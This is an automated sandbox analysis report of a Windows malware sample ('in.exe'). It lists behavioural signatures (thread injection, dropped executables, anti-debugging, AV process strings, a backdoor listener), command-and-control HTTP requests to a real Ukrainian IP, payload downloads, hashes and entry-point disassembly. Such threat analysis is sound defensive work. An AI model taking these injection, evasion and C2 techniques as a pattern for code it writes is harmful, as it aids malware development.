Analysis Report

Overview

General Information

Analysis ID: 57308
Start time: 13:01:19
Start date: 19/02/2015
Overall analysis duration: 0h 4m 29s
Report type: full
Sample file name: in.exe
Cookbook file name: default.jbs
Analysis system description: XP SP3 (Office 2003 SP2, Java 1.6.0, Acrobat Reader 9.3.4, Internet Explorer 8)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
HCA enabled: true
HCA success:
  • true, ratio: 99%
  • Number of executed functions: 64
  • Number of non-executed functions: 117
Warnings:
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.


Detection

Strategy | Report FP/FN
Threshold | malicious


Signature Overview


DDOS:

Contains functionality to access network services in a loop (often DDOS functionality)
  • Source: C:\WINDOWS\system32\svchost.exe | Code function: 6_2_00EF11C5 WSAStartup,GetLastError,WSACreateEvent,shutdown,closesocket,Sleep,WSASocketW,inet_addr,htons,WSAConnect,Sleep,WSAConnect,WSASend,WSAEventSelect,WSAWaitForMultipleEvents,WSAEnumNetworkEvents,WSARecv,WSAGetLastError,GetTickCount,GetTickCount,GetTickCount,shutdown,closesocket,WSACloseEvent,CloseHandle

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
  • Source: C:\WINDOWS\system32\svchost.exe | Code function: 6_2_00EF9B51 CryptAcquireContextW,CryptAcquireContextW,GetLastError,GetLastError,CryptAcquireContextW,CryptImportKey,CryptCreateHash,CryptHashData,CryptVerifySignatureW,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a window with clipboard capturing capabilities
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe | Window created: window name: CLIPBRDWNDCLASS
  • Source: C:\WINDOWS\yDDWPXuvXqBkqjT.exe | Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Checks if browser processes are running
  • Source: C:\WINDOWS\system32\svchost.exe | Code function: 6_2_00EFD99B StrStrIW,StrStrIW,StrStrIW,StrStrIW, chrome.exe
  • Source: C:\WINDOWS\system32\svchost.exe | Code function: 6_2_00EFD99B StrStrIW,StrStrIW,StrStrIW,StrStrIW, firefox.exe
  • Source: C:\WINDOWS\system32\svchost.exe | Code function: 6_2_00EFD99B StrStrIW,StrStrIW,StrStrIW,StrStrIW, iexplore.exe

Networking:

URLs found in memory or binary data
  • Source: svchost.exe | String found in binary or memory: http://icanhazip.com
  • Source: PTnbUd10.exe.dr | String found in binary or memory: http://schemas.microsoft.com/smi/2005/windowssettings
Contains functionality to download additional files from the internet
  • Source: C:\WINDOWS\system32\svchost.exe | Code function: 6_2_00EFA86A select,WSAGetLastError,recvfrom
Downloads files
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | File created: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\RC9GAWT2\gb_eula[1].pdf
Downloads files from webservers via HTTP
  • Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Accept: text/*, application/* User-Agent: Mazilla/5.0 Host: checkip.dyndns.org Cache-Control: no-cache
  • Source: global traffic | HTTP traffic detected: GET /1902uk11/377142/0/51-SP:/0/ELLBEGLBEKBEI HTTP/1.1 User-Agent: Mazilla/5.0 Host: 31.43.236.251:14033 Cache-Control: no-cache
  • Source: global traffic | HTTP traffic detected: GET /mandoc/gb_eula.pdf HTTP/1.1 Accept: text/*, application/* User-Agent: Mazilla/5.0 Host: soundsofnote.com Cache-Control: no-cache
  • Source: global traffic | HTTP traffic detected: GET /1902uk11/377142/41/7/4/ HTTP/1.1 User-Agent: Mazilla/5.0 Host: 31.43.236.251:14033 Cache-Control: no-cache
Downloads files with wrong headers with respect to MIME Content-Type
  • Source: http | Bad PDF prefix: HTTP/1.1 200 OK Content-Type: text/html Server: DynDNS-CheckIP/1.0 Connection: close Cache-Control: no-cache Pragma: no-cache Content-Length: 105 Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 188.138.17.15</body></html>
  • Source: http | Bad PDF prefix: HTTP/1.1 200 OK Date: Thu, 19 Feb 2015 12:01:57 GMT Server: Apache Last-Modified: Thu, 19 Feb 2015 10:19:49 GMT Accept-Ranges: bytes Content-Length: 407410 Content-Type: application/pdf
Performs DNS lookups
  • Source: unknown | DNS traffic detected: queries for: checkip.dyndns.org
Detected TCP or UDP traffic on non-standard ports
  • Source: global traffic | TCP traffic: 192.168.1.10:1031 -> 31.43.236.251:14033
  • Source: global traffic | TCP traffic: 192.168.1.10:45112 -> 107.23.150.92:3478
  • Source: global traffic | TCP traffic: 192.168.1.10:45112 -> 173.194.78.127:19302
  • Source: global traffic | TCP traffic: 192.168.1.10:45112 -> 77.72.169.154:3478
  • Source: global traffic | TCP traffic: 192.168.1.10:45112 -> 77.72.174.165:3478
May check the online IP address of the machine
  • Source: in.exe | String found in binary or memory: checkip.dyndns.org
  • Source: svchost.exe | String found in binary or memory: http://icanhazip.com
  • Source: unknown | DNS query: name: checkip.dyndns.org
Uses STUN server to do NAT traversal
  • Source: unknown | DNS query: name: stun.ekiga.net
  • Source: unknown | DNS query: name: stun.internetcalls.com
  • Source: unknown | DNS query: name: stun.l.google.com
  • Source: unknown | DNS query: name: stun.stunprotocol.org
Uses network protocols on non-standard ports
  • Source: unknown | Network traffic detected: HTTP traffic on port 1031 -> 14033
  • Source: unknown | Network traffic detected: HTTP traffic on port 1033 -> 14033
Uses the I2P (Invisible Internet Project) to hide its network activities
  • Source: svchost.exe | String found in binary or memory: I2P_EVENT
  • Source: svchost.exe | String found in binary or memory: I2P_NODESTAT

Boot Survival:

Contains functionality to start windows services
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe | Code function: 4_2_004031D0 EntryPoint,HeapCreate,lstrcpy,StartServiceCtrlDispatcherW,ExitProcess

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
  • Source: C:\WINDOWS\system32\svchost.exe | Code function: 6_2_00EFA78C htons,socket,bind,WSAGetLastError,closesocket,WSASetLastError
Opens a port and listens for incoming connection (possibly a backdoor)
  • Source: C:\WINDOWS\system32\svchost.exe | Socket bind: port: 45112
Contains VNC / remote desktop functionality (version string found)
  • Source: svchost.exe | String found in binary or memory: vnc32
Contains strings which may be related to BOT commands
  • Source: svchost.exe | String found in binary or memory: ==General==
  • Source: svchost.exe | String found in binary or memory: ==Programs==
  • Source: svchost.exe | String found in binary or memory: ==Users==
  • Source: svchost.exe | String found in binary or memory: cannot get config

Persistence and Installation Behavior:

Creates license or readme file
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | File created: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\RC9GAWT2\gb_eula[1].pdf
Drops PE files
  • Source: C:\in.exe | File created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | File created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe
Drops executables to the windows directory (C:\Windows) and starts them
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe | Executable created and started: C:\WINDOWS\yDDWPXuvXqBkqjT.exe
Drops files with a non-matching file extension (content does not match file extension)
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | File created: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\RC9GAWT2\gb_eula[1].pdf
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe | File created: C:\WINDOWS\yDDWPXuvXqBkqjT.exe
  • Source: C:\WINDOWS\system32\svchost.exe | File created: C:\WINDOWS\system32\config\systemprofile\Application Data\nwuvbe82n0.dll

Data Obfuscation:

Contains functionality to dynamically determine API calls
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Code function: 3_2_018F2E5E LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary
PE file contains sections with non-standard names
  • Source: initial sample | Static PE information: section name: .yhgq

System Summary:

Executable creates window controls seldom found in malware
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe | Window found: window name: RICHEDIT
Uses Rich Edit Controls
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe | File opened: C:\WINDOWS\system32\Riched32.dll
Contains functionality to adjust token privileges (e.g. debug / backup)
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Code function: 3_2_018F20DF GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle
Contains functionality to enum processes or threads
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Code function: 3_2_018F225A CreateToolhelp32Snapshot,Process32First,lstrcmpiA,OpenProcess,CloseHandle,Process32Next
Contains functionality to load and extract PE file embedded resources
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Code function: 3_2_018F1E3A FindResourceA,SizeofResource,LoadResource,LockResource,GetEnvironmentVariableA,lstrlenA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,DeleteFileA,DeleteFileA,lstrcatA,lstrcatA,DeleteFileA,CreateThread,CloseHandle,CreateProcessA,Sleep
Contains functionality to modify services (start/stop/modify)
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe | Code function: 4_2_004031D0 EntryPoint,HeapCreate,lstrcpy,StartServiceCtrlDispatcherW,ExitProcess
Creates temporary files
  • Source: C:\in.exe | File created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AYAX2DA5.tmp
Reads ini files
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe | File read: C:\WINDOWS\win.ini
Spawns processes
  • Source: unknown | Process created: C:\in.exe
  • Source: unknown | Process created: C:\in.exe
  • Source: unknown | Process created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
  • Source: unknown | Process created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
  • Source: unknown | Process created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe
  • Source: unknown | Process created: C:\WINDOWS\yDDWPXuvXqBkqjT.exe
  • Source: C:\in.exe | Process created: C:\in.exe C:\in.exe
  • Source: C:\in.exe | Process created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Process created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Process created: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe | Process created: C:\WINDOWS\yDDWPXuvXqBkqjT.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe
Contains functionality to call native functions
  • Source: C:\in.exe | Code function: 0_2_00402AB5 GetCommandLineW,CreateProcessW,NtGetContextThread,NtUnmapViewOfSection
Contains functionality to delete services
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe | Code function: 4_2_004023A0 OpenSCManagerW,DeleteFileW,CreateServiceW,RtlGetLastWin32Error,OpenServiceW,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Contains functionality to launch a process as a different user
  • Source: C:\WINDOWS\system32\svchost.exe | Code function: 6_2_00EF573E lstrlenW,CreateEnvironmentBlock,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock
Contains functionality to shutdown / reboot the system
  • Source: C:\WINDOWS\system32\svchost.exe | Code function: 6_2_00EF5A25 ShellExecuteW, C:\windows\system32\shutdown.exe
Creates files inside the system directory
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe | File created: C:\WINDOWS\yDDWPXuvXqBkqjT.exe
Creates mutexes
  • Source: C:\WINDOWS\system32\svchost.exe | Mutant created: \BaseNamedObjects\Global\zx5fwtw4ep
Reads the hosts file
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | File read: C:\WINDOWS\system32\drivers\etc\hosts
  • Source: C:\WINDOWS\system32\svchost.exe | File read: C:\WINDOWS\system32\drivers\etc\hosts
Tries to load missing DLLs
  • Source: C:\WINDOWS\system32\svchost.exe | Section loaded: bcrypt.dll

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to create a new security descriptor
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Code function: 3_2_018F16F7 AllocateAndInitializeSid,GetTokenInformation,EqualSid,CloseHandle,FreeSid
Contains functionality to launch a program with higher privileges
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Code function: 3_2_018F1BC9 GetModuleHandleA,GetModuleFileNameW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,CreateThread,CloseHandle,ShellExecuteExW,ExitProcess
Contains functionality to enumerate processes and check for explorer.exe or svchost.exe (often used for thread injection)
  • Source: C:\WINDOWS\system32\svchost.exe | Code function: 6_2_00EF5617 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,lstrcmpiW,OpenProcess,Process32NextW,CloseHandle,CloseHandle, explorer.exe
Injects a PE file into a foreign process
  • Source: C:\in.exe | Memory written: C:\in.exe base: 400000 value starts with: 4D5A
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Memory written: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
  • Source: C:\WINDOWS\yDDWPXuvXqBkqjT.exe | Section loaded: unknown target pid: 832 protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
  • Source: C:\in.exe | Thread register set: target process: 156
Queues an APC in another process (thread injection)
  • Source: C:\WINDOWS\yDDWPXuvXqBkqjT.exe | Thread APC queued: target process: 832

Anti Debugging and Sandbox Evasion:

Contains functionality to query system information
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Code function: 3_2_018F13C8 GetTickCount,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetVersionExA
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | System information queried: KernelDebuggerInformation
Contains functionality to dynamically determine API calls
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Code function: 3_2_018F2E5E LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary
Contains functionality which may be used to detect a debugger (GetProcessHeap)
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Code function: 3_2_018F4000 GetProcessHeap,HeapAlloc,GetComputerNameA,GetVersionExA,wsprintfA
Creates guard pages, often used to prevent reverse engineering and debugging
  • Source: C:\in.exe | Memory protected: page read and write and page guard
Enables debug privileges
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe | Process token adjusted: Debug
May sleep (evasive loops) to hinder dynamic analysis
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe TID: 196 | Thread sleep time: -922337203685477ms >= -60000ms
  • Source: C:\WINDOWS\system32\svchost.exe TID: 240 | Thread sleep count: 241 > 100
  • Source: C:\WINDOWS\system32\svchost.exe TID: 240 | Thread sleep time: -60250ms >= -60000ms
  • Source: C:\WINDOWS\system32\svchost.exe TID: 868 | Thread sleep time: -922337203685477ms >= -60000ms

Virtual Machine Detection:

Contains functionality to query system information
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Code function: 3_2_018F13C8 GetTickCount,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetVersionExA
Queries a list of all running processes
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe | Process information queried: ProcessInformation
Contains long sleeps (>= 3 min)
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Thread delayed: delay time: -922337203685477

Hooking and other Techniques for Hiding and Protection:

Contains functionality to install a shim (may redirect execution)
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Code function: 3_2_018F35D9 "%%windir%%\system32\sdbinst.exe" /q /u "%s"
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Code function: 3_2_018F3521 "%%windir%%\system32\sdbinst.exe" /q "%s"
Disables application error messages (SetErrorMode)
  • Source: C:\in.exe | Process information set: NOOPENFILEERRORBOX
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Process information set: NOOPENFILEERRORBOX
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe | Process information set: NOOPENFILEERRORBOX
Deletes itself after installation
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | File deleted: c:\in.exe
Icon mismatch, uses an icon from a different legit application in order to fool users
  • Source: initial sample | Icon embedded in PE file: icon matches a legit application icon: 6ccecccccc8ca4d0
Uses network protocols on non-standard ports
  • Source: unknown | Network traffic detected: HTTP traffic on port 1031 -> 14033
  • Source: unknown | Network traffic detected: HTTP traffic on port 1033 -> 14033

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
  • Source: Homeupd.exe | Binary or memory string: mbam.exe
  • Source: Homeupd.exe | Binary or memory string: avgnt.exe
  • Source: Homeupd.exe | Binary or memory string: avgui.exe

Language, Device and Operating System Detection:

Contains functionality to create pipes for IPC
  • Source: C:\WINDOWS\system32\svchost.exe | Code function: 6_2_00EF6B9A CreateNamedPipeW,ConnectNamedPipe,GetLastError,CreateThread,CloseHandle
Contains functionality to query local / system time
  • Source: C:\WINDOWS\system32\svchost.exe | Code function: 6_2_00EF549D GetLocalTime
Contains functionality to query the account / user name
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Code function: 3_2_018F1812 GetUserNameA,wsprintfA
Contains functionality to query windows version
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe | Code function: 3_2_018F13C8 GetTickCount,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetVersionExA
Queries the cryptographic machine GUID
  • Source: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Yara Overview

No Yara matches

Startup

  • system is xp
  • in.exe (PID: 524 MD5: 08CEA5CA7A6C1BCEEBE4ADC7FD9404D1)
    • in.exe (PID: 156 MD5: 08CEA5CA7A6C1BCEEBE4ADC7FD9404D1)
  • cleanup

Created / dropped Files

File Path | Type
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AYAX2DA5.tmp
  • Type: data
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Homeupd.exe
  • Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\PTnbUd10.exe
  • Type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\RC9GAWT2\gb_eula[1].pdf
  • Type: data
C:\WINDOWS\system32\config\systemprofile\Application Data\nwuvbe82n0.dll
  • Type: data
C:\WINDOWS\yDDWPXuvXqBkqjT.exe
  • Type: MS Windows icon resource - 3 icons, 16x16, 16-colors
\ROUTER
  • Type: GLS_BINARY_LSB_FIRST

Contacted Domains/Contacted IPs

Contacted Domains

Name | IP | Name Server | Active | Registrar | e-Mail
soundsofnote.com | 216.194.168.39 | unknown | true | unknown | unknown
stun.internetcalls.com | 77.72.169.154 | unknown | true | unknown | unknown
stun.l.google.com | 173.194.78.127 | unknown | true | unknown | unknown
google.com | 173.194.65.101 | unknown | true | unknown | unknown
stun.stunprotocol.org | 107.23.150.92 | unknown | true | unknown | unknown
stun.ekiga.net | 77.72.174.165 | unknown | true | unknown | unknown
checkip.dyndns.org | 91.198.22.70 | unknown | true | unknown | unknown

Contacted IPs

IP | Country | Pingable | Open Ports
31.43.236.251 | Ukraine | unknown | unknown
107.23.150.92 | United States | unknown | unknown
173.194.65.101 | United States | unknown | unknown
173.194.78.127 | United States | unknown | unknown
77.72.169.154 | Netherlands | unknown | unknown
195.186.1.121 | Switzerland | unknown | unknown
216.194.168.39 | United States | unknown | unknown
77.72.174.165 | Netherlands | unknown | unknown
91.198.22.70 | United Kingdom | unknown | unknown

Static File Info

General

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
TrID:
  • Win64 Executable (generic) (27655/43) 72.25%
  • Win32 Executable (generic) (4510/7) 11.78%
  • Win16/32 Executable Delphi generic (2074/23) 5.42%
  • Generic Win/DOS Executable (2004/3) 5.24%
  • DOS Executable Generic (2002/1) 5.23%
File name: in.exe
File size: 26624
MD5: 08cea5ca7a6c1bceebe4adc7fd9404d1
SHA1: b94af9934c1f8124b38b92afd248340f06d51e7f
SHA256: fe8b5d3603da5a11a7a8cc11cf63adc2eef35a41bfe8161f390e94ee98dc63e3
SHA512: 7751e88b68687be25f5218253550f766b3c5ecddb5884dfb3733bd9d159b40a20b51e706f5fb100f7dee55312bf385808f1d84d39509f4b7f06db6a619ce7cb1

Static PE Info

General

Entrypoint: 0x402000
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp: 0x3E692464 [Fri Mar 07 22:59:48 2003 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0

Entrypoint Preview

Instruction
push 00000000h
call dword ptr [00403248h]
mov dword ptr [004040B9h], eax
mov ecx, 0001EB0Ch
call 0D2F59EAh
jmp 0D2F4BB9h
push 004040A9h
call dword ptr [00403668h]
test eax, eax
je 0D2F49EDh
push 00000000h
push dword ptr [004040B9h]
push 00000000h
push 00000000h
push 00000100h
push 00000100h
push 00000080h
push 00000090h
push 00CF0000h
push 00404000h
push 0040406Eh
push 00000000h
call dword ptr [00403640h]
test eax, eax
je 0D2F49B2h
push 00000000h
push 00000000h
push 00000000h
push 004040D9h
call dword ptr [00403650h]
cmp eax, 01h
jc 0D2F499Ch
jne 0D2F496Ah
push 004040D9h
call dword ptr [00403674h]
push 004040D9h
call dword ptr [00403648h]
jmp 0D2F4952h
push dword ptr [004040E1h]
call dword ptr [004031F8h]
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 01h
je 0D2F4A12h
cmp dword ptr [ebp+0Ch], 05h
je 0D2F49ACh
cmp dword ptr [ebp+0Ch], 07h
je 0D2F49EFh

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x30bc | 0x6e8 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7000 | 0x2c40 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Entropy | Xored PE | ZLIB Complexity | File Type | Characteristics
.yhgq | 0x1000 | 0x176 | 0x200 | 3.8501508954 | False | 0.5078125 | data | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.text | 0x2000 | 0x17a4 | 0x1800 | 6.28919596492 | False | 0.6484375 | data | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x4000 | 0x5f8 | 0x600 | 1.2359485614 | False | 0.156901041667 | data | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata | 0x5000 | 0x14dd | 0x1600 | 4.5822285786 | False | 0.471590909091 | data | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x7000 | 0x2c40 | 0x2e00 | 4.38642924386 | False | 0.294497282609 | data | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country | Nbr Of Functions | Xored PE
RT_ICON | 0x70a8 | 0x25a8 | data | | | 0 | False
RT_MENU | 0x96b4 | 0x90 | data | English | United States | 0 | False
RT_GROUP_ICON | 0x9660 | 0x14 | MS Windows icon resource - 1 icon | | | 0 | False
RT_VERSION | 0x9784 | 0x22c | data | | | 0 | False
RT_MANIFEST | 0x99f0 | 0x250 | XML document text | | | 0 | False

Imports

DLL | Import
KERNEL32.dll | CloseHandle, CreateFileW, EnterCriticalSection, ExitProcess, FindClose, FindFirstFileW, FindNextFileW, FormatMessageW, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetCommandLineW, GetComputerNameW, GetConsoleMode, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceA, GetEnvironmentStringsA, GetEnvironmentStringsW, GetFileAttributesW, GetFileType, GetLastError, GetLocalTime, GetModuleHandleA, GetModuleHandleW, GetStdHandle, GetSystemTimeAsFileTime, GetVersionExA, GetVolumeInformationW, GlobalMemoryStatus, LoadLibraryA, LoadLibraryW, LocalAlloc, LocalFree, QueryDosDeviceW, SetLastError, SetUnhandledExceptionFilter, TerminateProcess, UnhandledExceptionFilter, WideCharToMultiByte, WriteConsoleW, WriteFile, lstrcatW, lstrcmpW, lstrcpyW, lstrlenW
USER32.dll | CreateWindowExA, DefWindowProcA, DispatchMessageA, GetClientRect, GetMessageA, LoadIconA, MessageBoxA, MessageBoxW, MoveWindow, PostQuitMessage, RegisterClassA, SendMessageA, SetFocus, TranslateMessage, wsprintfW
gdi32.dll | CreateFontA, DeleteObject

Version Infos

Description | Data
LegalCopyright | All rights reserved.
FileDescription | unpnpao uhnwlnylpggy
FileVersion | 1.0.2.2
OriginalFilename | nawchdupee.exe
ProductVersion | 1.0.2.2
Translation | 0x0409 0x0000

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

TCP Packets

Feb 19, 2015 13:01:58.339025021 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.339380026 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.339421988 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.339426994 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.339742899 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.339775085 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.342705011 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.342711926 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.342714071 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.342807055 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.354738951 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.354759932 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.354917049 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.432318926 MEZ801032216.194.168.39192.168.1.10
Feb 19, 2015 13:01:58.432439089 MEZ103280192.168.1.10216.194.168.39
Feb 19, 2015 13:01:58.531083107 MEZ801032216.194.168.39192.168.1.10
